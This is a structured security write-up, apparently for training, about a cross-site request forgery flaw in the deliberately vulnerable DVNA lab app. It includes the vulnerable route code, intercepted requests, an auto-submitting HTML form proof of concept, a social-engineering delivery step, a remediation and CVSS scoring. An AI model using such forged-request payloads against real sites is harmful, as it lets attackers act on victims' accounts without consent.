## Version 1.4.2
## language: en

Feature:
  TOE:
    DVNA
  Category:
    Insecure Interaction Between Components
  Location:
    /app/modifyproduct - Form
  CWE:
    CWE-0352: Cross-Site Request Forgery (CSRF) -compound-
      https://cwe.mitre.org/data/definitions/352.html
    CWE-0346: Origin Validation Error -base-
      https://cwe.mitre.org/data/definitions/346.html
    CWE-0345: Insufficient Verification of Data Authenticity -class-
      https://cwe.mitre.org/data/definitions/345.html
    CWE-0949: SFP Secondary Cluster: Faulty Endpoint Authentication -category-
      https://cwe.mitre.org/data/definitions/949.html
  CAPEC:
    CAPEC-467: Cross Site Identification -detailed-
      http://capec.mitre.org/data/definitions/467.html
    CAPEC-062: Cross Site Request Forgery -standard-
      http://capec.mitre.org/data/definitions/62.html
    CAPEC-021: Exploitation of Trusted Credentials -meta-
      http://capec.mitre.org/data/definitions/21.html
  Rule:
    REQ.263: https://fluidattacks.com/web/es/rules/263/
  Goal:
    Send a request on behalf of the logged in user without their action
  Recommendation:
    Implement an anti-CSRF token

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running DVNA in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  No access control
    Given I see the code at "dvna/routes/app.js"
    """
    103 module.exports.modifyProductSubmit = function (req, res) {
    104  if (!req.body.id || req.body.id == '') {
    105     req.body.id = 0
    106   }
    107   db.Product.find({
    108     where: {
    109       'id': req.body.id
    110     }
    111   }).then(product => {
    112     if (!product) {
    113       product = new db.Product()
    114     }
    115     product.code = req.body.code
    116     product.name = req.body.name
    117     product.description = req.body.description
    118     product.tags = req.body.tags
    119     product.save().then(p => {
    120       if (p) {
    121         req.flash('success', 'Product added/modified!')
    122         res.redirect('/app/products')
    123       }
    124     }).catch(err => {
    125       output = {
    126         product: product
    127       }
    128       req.flash('danger',err)
    129       res.render('app/modifyproduct', {
    130         output: output
    131       })
    132     })
    133   })
    134 }
    """
    Then I see it executes the transaction with no regard for req origin at all

  Scenario: Dynamic detection
  Checking default routes
    Given I go to "http://localhost:8000/app/modifyproduct"
    Then I intercept a request to create a new product
    """
    POST /app/modifyproduct HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/
    66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/app/modifyproduct
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 68
    Connection: close
    Cookie: cookieconsent_status=dismiss; continueCode=qo61W2w2ZW6a3BeyxzDmjrPKl
    Y5bAyD0LO4XpRqkJQ8VE7g1ovNMn9kZ9wrE; connect.sid=s%3AAlQ52qhr7LkuRmnbEIsmlrC
    35Ylac6Ki.OAJbwAc%2FOXNTEDGORoI6Y%2BshSSs7oGXVFmxc0pEcls8
    Upgrade-Insecure-Requests: 1

    id=&name=alalal&code=2&tags=algo%2C+muy%2C+raro&description=dddddddd
    """
    Then I try changing the host header to see if it accepts external requests
    """
    POST /app/modifyproduct HTTP/1.1
    Host: test
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/
    66.0
    ...
    """
    And it returns the response
    """
    Product added/modified!
    """
    Then it's vulnerable to CSRF

  Scenario: Exploitation
  Modifying products on behalf of another user
    Given I craft a page that POSTs a modification for a product owned by user
    """
    <FORM NAME="poc" ENCTYPE="application/x-www-form-urlencoded"
    action="http://127.0.0.1:8000/app/modifyproduct" METHOD="POST">
    <input type="hidden" name='id' value="2">
    <input type="hidden" name='name' value="somename">
    <input type="hidden" name='code' value="3">
    <input type="hidden" name='tags' value="pwnd">
    <input type="hidden" name='description' value="rip">
    </FORM>
    <script>document.poc.submit();</script>
    """
    Then I send the link to the user with social engineering
    Then when they click on the link, their product gets modified

  Scenario: Remediation
  Anti-csrf token
    Given I generate an anti-csrf token everytime the user edits a product
    And validate the token when recieving the POST req before saving changes
    Then CSRF isn't posible anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.3/10 (High) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.7/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.7/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    0079-xss-stored
      Given I craft the CSRF to inject a XSS payload into the modified product
      Then when the victim clicks on the link the product is tainted
      And when a user sees it the JS payload is executed in their browser
